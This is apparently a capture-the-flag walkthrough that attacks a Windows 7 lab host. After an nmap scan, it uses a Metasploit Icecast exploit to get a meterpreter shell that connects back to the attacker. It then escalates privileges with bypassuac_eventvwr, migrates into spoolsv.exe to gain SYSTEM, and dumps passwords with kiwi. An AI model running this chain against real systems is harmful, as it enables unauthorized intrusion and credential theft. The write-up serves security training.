Nmap scan
kali@kali:~$ nmap -T4 -sC -sV 10.10.218.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-18 02:00 EST
Nmap scan report for 10.10.218.181
Host is up (0.35s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
|_ssl-date: 2020-11-18T07:02:03+00:00; +1s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 1h30m01s, deviation: 3h00m01s, median: 0s
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:0f:04:dc:0d:53 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-11-18T01:01:50-06:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-18T07:01:52
|_ start_date: 2020-11-18T06:57:46Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.41 seconds
Let’s on metasploit and search for an exploit on icecast
Use the command options and go ahead and set the required fields.
Below shows we need to set the RHOST, and LHOST (set to THM VPN IP)
Let’s run the exploit, and we have a meterpreter shell.
We can look at processes by using the command: ps
From above we can see that the user Dark is running the icecast process.
We can also look into $ sysinfo to know the build of the system.
We can run the command: $ run post/multi/recon/local_exploit_suggester to find exploits for priv esc.
Let’s try the first exploit $exploit/windows/local/bypassuac_eventvwr
First, we have to background the current session. Double-check your session number.
Run the full path of the exploit: $ exploit/windows/local/bypassuac_eventvwr
Set the correct SESSION and LHOST.
Once you run it we should have created another session.
Using the $ getprivscommand we can check our privileges.
Just to compare and show that we indeed have extended our privileges. Let’s background this current session.
Go into the previous session and use the $ getpriv command again.
We can see below that we only have a few as compared to the new session.
Now if we use the ps command again in the newer session. We can see that we are able to view processes being run by NT AUTHORITY\SYSTEM.
Next, we want to interact with the lass service. To do this, we need to move into a process that has permission to do that. Meaning the same privileges and architecture. One such process is the spoolsv.exe process.
Migrate to this process $ migrate 1256
Now with the command: $ getuid
We can see that we are currently running as NT AUTHORITY\SYSTEM.
Next, let’s use kiwi: meterpreter: load kiwi
Using help we can see the new section for kiwi.
With kiwi we can dump out passwords. Let use the command: creds_all
Kiwi allows you to get a password from the memory without the user Dark being logged in, as there is a scheduled task running icecast by Dark.
Another thing to note is that kiwi allows us to create a golden ticket. This will allow us to authenticate as any user on the domain. Read more about it here.
